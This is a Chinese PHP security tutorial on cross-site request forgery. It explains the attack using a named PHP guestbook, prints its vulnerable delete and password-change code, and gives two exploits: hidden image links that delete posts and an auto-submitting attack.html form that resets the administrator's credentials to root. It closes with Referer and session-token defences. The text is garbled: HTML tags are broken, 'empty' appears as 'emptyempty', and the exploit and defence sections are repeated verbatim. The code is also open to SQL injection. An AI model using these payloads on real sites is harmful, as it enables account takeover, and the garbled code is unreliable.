PHP漏洞全解-跨網(wǎng)站請(qǐng)求偽造

CSRF(Cross Site Request Forgeries)，意為跨網(wǎng)站請(qǐng)求偽造，也有寫(xiě)為XSRF。攻擊者偽造目標(biāo)用戶(hù)的HTTP請(qǐng)求，然后此請(qǐng)求發(fā)送到有CSRF漏洞的網(wǎng)站，網(wǎng)站執(zhí)行此請(qǐng)求后，引發(fā)跨站請(qǐng)求偽造攻擊。攻擊者利用隱蔽的HTTP連接，讓目標(biāo)用戶(hù)在不注意的情況下單擊這個(gè)鏈接，由于是用戶(hù)自己點(diǎn)擊的，而他又是合法用戶(hù)擁有合法權(quán)限，所以目標(biāo)用戶(hù)能夠在網(wǎng)站內(nèi)執(zhí)行特定的HTTP鏈接，從而達(dá)到攻擊者的目的。

例如:某個(gè)購(gòu)物網(wǎng)站購(gòu)買(mǎi)商品時(shí)，采用http://www.shop.com/buy.php?item=watch&num=1，item參數(shù)確定要購(gòu)買(mǎi)什么物品，num參數(shù)確定要購(gòu)買(mǎi)數(shù)量，如果攻擊者以隱藏的方式發(fā)送給目標(biāo)用戶(hù)鏈接

，那么如果目標(biāo)用戶(hù)不小心訪問(wèn)以后，購(gòu)買(mǎi)的數(shù)量就成了1000個(gè)

實(shí)例

隨緣網(wǎng)絡(luò)PHP留言板V1.0

任意刪除留言

//delbook.php 此頁(yè)面用于刪除留言

include_once("dlyz.php"); //dlyz.php用戶(hù)驗(yàn)證權(quán)限，當(dāng)權(quán)限是admin的時(shí)候方可刪除留言 
include_once("../conn.php"); 
$del=$_GET["del"]; 
$id=$_GET["id"]; 
if ($del=="data") 
{ 
    $ID_Dele= implode(",",$_POST['adid']); 
    $sql="delete from book where id in (".$ID_Dele.")"; 
    mysql_query($sql); 
} 
else 
{ 
    $sql="delete from book where id=".$id; //傳遞要?jiǎng)h除的留言ID 
    mysql_query($sql); 
} 
mysql_close($conn); 
echo ""; 
echo "alert(‘刪除成功！’);"; 
echo " location=’book.php’;"; 
echo ""; 
?> 

當(dāng)我們具有admin權(quán)限，提交http://localhost/manage/delbook.php?id=2 時(shí)，就會(huì)刪除id為2的留言

利用方法:

我們使用普通用戶(hù)留言（源代碼方式），內(nèi)容為

"delbook.php?id=2" /> 
"delbook.php?id=3" /> 
"delbook.php?id=4" /> 
"delbook.php?id=5" /> 

插入4張圖片鏈接分別刪除4個(gè)id留言，然后我們返回首頁(yè)瀏覽看，沒(méi)有什么變化。。圖片顯示不了

現(xiàn)在我們?cè)儆霉芾韱T賬號(hào)登陸后，來(lái)刷新首頁(yè)，會(huì)發(fā)現(xiàn)留言就剩一條，其他在圖片鏈接中指定的ID號(hào)的留言，全部都被刪除。

攻擊者在留言中插入隱藏的圖片鏈接，此鏈接具有刪除留言的作用，而攻擊者自己訪問(wèn)這些圖片鏈接的時(shí)候，是不具有權(quán)限的，所以看不到任何效果，但是當(dāng)管理員登陸后，查看此留言，就會(huì)執(zhí)行隱藏的鏈接，而他的權(quán)限又是足夠大的，從而這些留言就被刪除了

修改管理員密碼

//pass.php 
if($_GET["act"]) 
{ 
    $username=$_POST["username"]; 
    $sh=$_POST["sh"]; 
    $gg=$_POST["gg"]; 
    $title=$_POST["title"]; 
    $copyright=$_POST["copyright"]."
設(shè)計(jì)制作：廈門(mén)隨緣網(wǎng)絡(luò)科技"; 
    $password=md5($_POST["password"]); 
if(emptyempty($_POST["password"])) 
{ 
    $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
} 
else 
{ 
    $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
} 
mysql_query($sql); 
mysql_close($conn); 
echo ""; 
echo "alert(‘修改成功！’);"; 
echo " location=’pass.php’;"; 
echo ""; 
} 

這個(gè)文件用于修改管理密碼和網(wǎng)站設(shè)置的一些信息，我們可以直接構(gòu)造如下表單:

<body> 
    <form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1"> 
    <input type="radio" value="1" name="sh"> 
    <input type="radio" name="sh" checked value="0"> 
    <input type="text" name="username" value="root"> 
    <input type="password" name="password" value="root"> 
    <input type="text" name="title" value="隨緣網(wǎng)絡(luò)PHP留言板V1.0(帶審核功能)" > 
    <textarea name="gg" rows="6" cols="80" >歡迎您安裝使用隨緣網(wǎng)絡(luò)PHP留言板V1.0(帶審核功能)！textarea> 
    <textarea name="copyright" rows="6" cols="80" >隨緣網(wǎng)絡(luò)PHP留言本V1.0 版權(quán)所有：廈門(mén)隨緣網(wǎng)絡(luò)科技 2005-2009<br/>承接網(wǎng)站建設(shè)及系統(tǒng)定制 提供優(yōu)惠主機(jī)域名textarea> 
    form> 
body> 

存為attack.html，放到自己網(wǎng)站上http://www.sectop.com/attack.html，此頁(yè)面訪問(wèn)后會(huì)自動(dòng)向目標(biāo)程序的pass.php提交參數(shù)，用戶(hù)名修改為root，密碼修改為root，然后我們?nèi)チ粞园灏l(fā)一條留言，隱藏這個(gè)鏈接，管理訪問(wèn)以后，他的用戶(hù)名和密碼全部修改成了root

防范方法

防范CSRF要比防范其他攻擊更加困難，因?yàn)镃SRF的HTTP請(qǐng)求雖然是攻擊者偽造的，但是卻是由目標(biāo)用戶(hù)發(fā)出的，一般常見(jiàn)的防范方法有下面幾種:

1、檢查網(wǎng)頁(yè)的來(lái)源

2、檢查內(nèi)置的隱藏變量

3、使用POST，不要使用GET

檢查網(wǎng)頁(yè)來(lái)源

在//pass.php頭部加入以下紅色字體代碼，驗(yàn)證數(shù)據(jù)提交

if($_GET["act"]) 
{ 
    if(isset($_SERVER["HTTP_REFERER"])) 
    { 
        $serverhost = $_SERVER["SERVER_NAME"]; 
        $strurl = str_replace("http://","",$_SERVER["HTTP_REFERER"]); 
        $strdomain = explode("/",$strurl); 
        $sourcehost = $strdomain[0]; 
    if(strncmp($sourcehost, $serverhost, strlen($serverhost))) 
    {
        unset($_POST); 
        echo ""; 
        echo "alert(‘數(shù)據(jù)來(lái)源異常!’);"; 
        echo " location=’index.php’;";
        echo ""; 
     } 
     } 
    $username=$_POST["username"]; 
    $sh=$_POST["sh"]; 
    $gg=$_POST["gg"]; 
    $title=$_POST["title"]; 
    $copyright=$_POST["copyright"]."
設(shè)計(jì)制作：廈門(mén)隨緣網(wǎng)絡(luò)科技"; 
    $password=md5($_POST["password"]); 
    if(emptyempty($_POST["password"])) 
    { 
        $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
    } 
    else 
    { 
        $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
    } 
mysql_query($sql); 
mysql_close($conn); 
echo ""; 
echo "alert(‘修改成功！’);"; 
echo " location=’pass.php’;"; 
echo ""; 
} 

檢查內(nèi)置隱藏變量

我們?cè)诒韱沃袃?nèi)置一個(gè)隱藏變量和一個(gè)session變量，然后檢查這個(gè)隱藏變量和session變量是否相等，以此來(lái)判斷是否同一個(gè)網(wǎng)頁(yè)所調(diào)用

php 
include_once("dlyz.php"); 
include_once("../conn.php"); 
if($_GET["act"]) 
{ 
if (!isset($_SESSION["post_id"])) 
{ 
// 生成唯一的ID，并使用MD5來(lái)加密 
$post_id = md5(uniqid(rand(), true)); 
// 創(chuàng)建Session變量 
$_SESSION["post_id"] = $post_id; 
} 
// 檢查是否相等 
if (isset($_SESSION["post_id"])) 
{ 
// 不相等 
if ($_SESSION["post_id"] != $_POST["post_id"]) 
{ 
// 清除POST變量 
unset($_POST); 
echo "<script language=’javascript’>"; 
echo "alert(‘數(shù)據(jù)來(lái)源異常!’);"; 
echo " location=’index.php’;"; 
echo "script>"; 
} 
} 
…… 
<input type="reset" name="Submit2" value="重 置"> 
<input type="hidden" name="post_id" value="php echo $_SESSION["post_id"];?>"> 
td>tr> 
table> 
form> 
php 
} 
mysql_close($conn); 
?> 
body> 
html> 

使用POST，不要使用GET

傳遞表單字段時(shí)，一定要是用POST，不要使用GET，處理變量也不要直接使用$_REQUEST

當(dāng)我們具有admin權(quán)限，提交http://localhost/manage/delbook.php?id=2 時(shí)，就會(huì)刪除id為2的留言

利用方法:

我們使用普通用戶(hù)留言（源代碼方式），內(nèi)容為

"delbook.php?id=2" /> 
"delbook.php?id=3" /> 
"delbook.php?id=4" /> 
"delbook.php?id=5" /> 

插入4張圖片鏈接分別刪除4個(gè)id留言，然后我們返回首頁(yè)瀏覽看，沒(méi)有什么變化。。圖片顯示不了

現(xiàn)在我們?cè)儆霉芾韱T賬號(hào)登陸后，來(lái)刷新首頁(yè)，會(huì)發(fā)現(xiàn)留言就剩一條，其他在圖片鏈接中指定的ID號(hào)的留言，全部都被刪除。

攻擊者在留言中插入隱藏的圖片鏈接，此鏈接具有刪除留言的作用，而攻擊者自己訪問(wèn)這些圖片鏈接的時(shí)候，是不具有權(quán)限的，所以看不到任何效果，但是當(dāng)管理員登陸后，查看此留言，就會(huì)執(zhí)行隱藏的鏈接，而他的權(quán)限又是足夠大的，從而這些留言就被刪除了

修改管理員密碼

//pass.php 
if($_GET["act"]) 
{ 
    $username=$_POST["username"]; 
    $sh=$_POST["sh"]; 
    $gg=$_POST["gg"]; 
    $title=$_POST["title"]; 
    $copyright=$_POST["copyright"]."
設(shè)計(jì)制作：廈門(mén)隨緣網(wǎng)絡(luò)科技"; 
    $password=md5($_POST["password"]); 
if(emptyempty($_POST["password"])) 
{ 
    $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
} 
else 
{ 
    $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
} 
mysql_query($sql); 
mysql_close($conn); 
echo ""; 
echo "alert(‘修改成功！’);"; 
echo " location=’pass.php’;"; 
echo ""; 
} 

這個(gè)文件用于修改管理密碼和網(wǎng)站設(shè)置的一些信息，我們可以直接構(gòu)造如下表單:

<body> 
    <form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1"> 
    <input type="radio" value="1" name="sh"> 
    <input type="radio" name="sh" checked value="0"> 
    <input type="text" name="username" value="root"> 
    <input type="password" name="password" value="root"> 
    <input type="text" name="title" value="隨緣網(wǎng)絡(luò)PHP留言板V1.0(帶審核功能)" > 
    <textarea name="gg" rows="6" cols="80" >歡迎您安裝使用隨緣網(wǎng)絡(luò)PHP留言板V1.0(帶審核功能)！textarea> 
    <textarea name="copyright" rows="6" cols="80" >隨緣網(wǎng)絡(luò)PHP留言本V1.0 版權(quán)所有：廈門(mén)隨緣網(wǎng)絡(luò)科技 2005-2009<br/>承接網(wǎng)站建設(shè)及系統(tǒng)定制 提供優(yōu)惠主機(jī)域名textarea> 
    form> 
body> 

存為attack.html，放到自己網(wǎng)站上http://www.sectop.com/attack.html，此頁(yè)面訪問(wèn)后會(huì)自動(dòng)向目標(biāo)程序的pass.php提交參數(shù)，用戶(hù)名修改為root，密碼修改為root，然后我們?nèi)チ粞园灏l(fā)一條留言，隱藏這個(gè)鏈接，管理訪問(wèn)以后，他的用戶(hù)名和密碼全部修改成了root

防范方法

防范CSRF要比防范其他攻擊更加困難，因?yàn)镃SRF的HTTP請(qǐng)求雖然是攻擊者偽造的，但是卻是由目標(biāo)用戶(hù)發(fā)出的，一般常見(jiàn)的防范方法有下面幾種:

1、檢查網(wǎng)頁(yè)的來(lái)源

2、檢查內(nèi)置的隱藏變量

3、使用POST，不要使用GET

檢查網(wǎng)頁(yè)來(lái)源

在//pass.php頭部加入以下紅色字體代碼，驗(yàn)證數(shù)據(jù)提交

if($_GET["act"]) 
{ 
    if(isset($_SERVER["HTTP_REFERER"])) 
    { 
        $serverhost = $_SERVER["SERVER_NAME"]; 
        $strurl = str_replace("http://","",$_SERVER["HTTP_REFERER"]); 
        $strdomain = explode("/",$strurl); 
        $sourcehost = $strdomain[0]; 
    if(strncmp($sourcehost, $serverhost, strlen($serverhost))) 
    {
        unset($_POST); 
        echo ""; 
        echo "alert(‘數(shù)據(jù)來(lái)源異常!’);"; 
        echo " location=’index.php’;";
        echo ""; 
     } 
     } 
    $username=$_POST["username"]; 
    $sh=$_POST["sh"]; 
    $gg=$_POST["gg"]; 
    $title=$_POST["title"]; 
    $copyright=$_POST["copyright"]."
設(shè)計(jì)制作：廈門(mén)隨緣網(wǎng)絡(luò)科技"; 
    $password=md5($_POST["password"]); 
    if(emptyempty($_POST["password"])) 
    { 
        $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
    } 
    else 
    { 
        $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
    } 
mysql_query($sql); 
mysql_close($conn); 
echo ""; 
echo "alert(‘修改成功！’);"; 
echo " location=’pass.php’;"; 
echo ""; 
} 

檢查內(nèi)置隱藏變量

我們?cè)诒韱沃袃?nèi)置一個(gè)隱藏變量和一個(gè)session變量，然后檢查這個(gè)隱藏變量和session變量是否相等，以此來(lái)判斷是否同一個(gè)網(wǎng)頁(yè)所調(diào)用

php 
include_once("dlyz.php"); 
include_once("../conn.php"); 
if($_GET["act"]) 
{ 
if (!isset($_SESSION["post_id"])) 
{ 
// 生成唯一的ID，并使用MD5來(lái)加密 
$post_id = md5(uniqid(rand(), true)); 
// 創(chuàng)建Session變量 
$_SESSION["post_id"] = $post_id; 
} 
// 檢查是否相等 
if (isset($_SESSION["post_id"])) 
{ 
// 不相等 
if ($_SESSION["post_id"] != $_POST["post_id"]) 
{ 
// 清除POST變量 
unset($_POST); 
echo "<script language=’javascript’>"; 
echo "alert(‘數(shù)據(jù)來(lái)源異常!’);"; 
echo " location=’index.php’;"; 
echo "script>"; 
} 
} 
…… 
<input type="reset" name="Submit2" value="重 置"> 
<input type="hidden" name="post_id" value="php echo $_SESSION["post_id"];?>"> 
td>tr> 
table> 
form> 
php 
} 
mysql_close($conn); 
?> 
body> 
html> 

使用POST，不要使用GET

傳遞表單字段時(shí)，一定要是用POST，不要使用GET，處理變量也不要直接使用$_REQUEST

服務(wù)器租用/服務(wù)器托管中國(guó)五強(qiáng)！虛擬主機(jī)域名注冊(cè)頂級(jí)提供商！15年品質(zhì)保障！--億恩科技[ENKJ.COM]